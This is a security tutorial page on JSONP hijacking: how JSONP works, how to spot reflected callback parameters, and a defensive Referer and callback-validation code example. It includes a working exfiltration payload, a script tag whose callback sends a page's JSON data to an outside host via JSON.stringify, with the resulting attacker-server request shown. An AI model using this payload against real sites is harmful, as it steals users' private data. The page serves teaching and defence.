JSONP Hijacking

🔍 Introduction

JSONP Hijacking is an attack in which an attacker can easily steal information when a page that handles sensitive data supports JSONP.

JSONP

JSONP is the approach chosen by services that find it difficult to communicate by making an exception to the SOP through a CORS policy. The function to be used as the callback is specified in advance and appears in the response data, so that the data can be read through <script src=''>.

Request

GET /user/info?callback=func1 HTTP/1.1

Response

func1({"data":"this_is_user_info_data"})

🗡 Offensive techniques

Detect

Pages that use jsonp explicitly can be identified right away. Ordinary pages can be affected too: depending on the service code or configuration, the function named in a parameter such as callback or jsonp may be reflected in the response.

[ Request ]
GET /user/info?jsonp=check HTTP/1.1

[ Response ]
HTTP/1.1 200 OK

check{
	"data":"data"
}

In this case the attacker controls the code in the response, so they can define the function that receives the callback themselves and have the information returned to them.

[ Request ]
GET /user/info?jsonp=check= HTTP/1.1

[ Response ]
HTTP/1.1 200 OK

check={
	"data":"data"
}

// Attacker's callback page
console.log(JSON.stringify(check))

Exploitation

JSONP pages usually return a JSON-formatted response, which makes JSON.stringify() a very convenient function for stealing the data. JSON.stringify() converts JSON data to a String, so the full JSON body of the response can be obtained directly, without parsing it.

<script src="target.domain.com/getData?callback=document.location.href='https://www.hahwul.com?'+JSON.stringify"></script>
document.location.href='https://www.hahwul.com?'+JSON.stringify({"name":"data~~"})

Attacker Server

GET /?{\"name\":\"data~~~~\"}
Host: www.hahwul.com

🛡 Defensive techniques

JSONP is not a safe construct in itself, so wherever possible communication should go through a CORS configuration so that the SOP is respected. If the nature of the service means JSONP has to be used, it is best to avoid handling important information through it as far as possible, and to verify where the request came from using the Referer header or similar.

(Of course, if you are going to validate the Referer anyway, it is better to implement this with CORS and respect the SOP.)
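
The Referer check recommended above, as an added example that is not code from the original page. It goes one step beyond the page by also restricting the callback to a bare identifier, which rejects the `check=` and `document.location.href=...` values shown earlier; `handleJsonp`, `refererOrigin` and the allowed origin are hypothetical names.

```javascript
// Added example, not the page's code. All names and origins are hypothetical.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]); // assumed first-party origin
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/; // a bare identifier, nothing else

// Origin of the Referer header, or null when it is missing or unparseable.
function refererOrigin(referer) {
  try {
    return new URL(referer).origin;
  } catch {
    return null;
  }
}

// Decide how to answer a JSONP request. `query` and `headers` are plain objects
// (header names lower-cased, as Node.js delivers them).
function handleJsonp(query, headers, data) {
  const callback = query.callback ?? query.jsonp;
  // Rejects "check=" and "document.location.href='...'+JSON.stringify".
  if (typeof callback !== "string" || !CALLBACK_RE.test(callback)) {
    return { status: 400, headers: {}, body: "invalid callback" };
  }
  // Exact origin comparison: a substring test would also accept
  // https://app.example.com.attacker.test/
  const origin = refererOrigin(headers.referer);
  if (origin === null || !ALLOWED_ORIGINS.has(origin)) {
    return { status: 403, headers: {}, body: "cross-site JSONP refused" };
  }
  return {
    status: 200,
    headers: {
      "content-type": "application/javascript; charset=utf-8",
      "x-content-type-options": "nosniff",
    },
    body: `${callback}(${JSON.stringify(data)});`,
  };
}

// Constructed sample requests.
const data = { data: "this_is_user_info_data" };
const ok = handleJsonp({ callback: "func1" },
  { referer: "https://app.example.com/profile" }, data);
console.log(ok.status, ok.body);
const xsite = handleJsonp({ callback: "func1" },
  { referer: "https://app.example.com.attacker.test/" }, data);
console.log(xsite.status, xsite.body);
```

Requests that arrive without a Referer are refused here, so first-party pages must not suppress the header (for example with `Referrer-Policy: no-referrer`).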

📌 References

  • https://www.hahwul.com/2019/07/28/json-hijacking-with-script-src/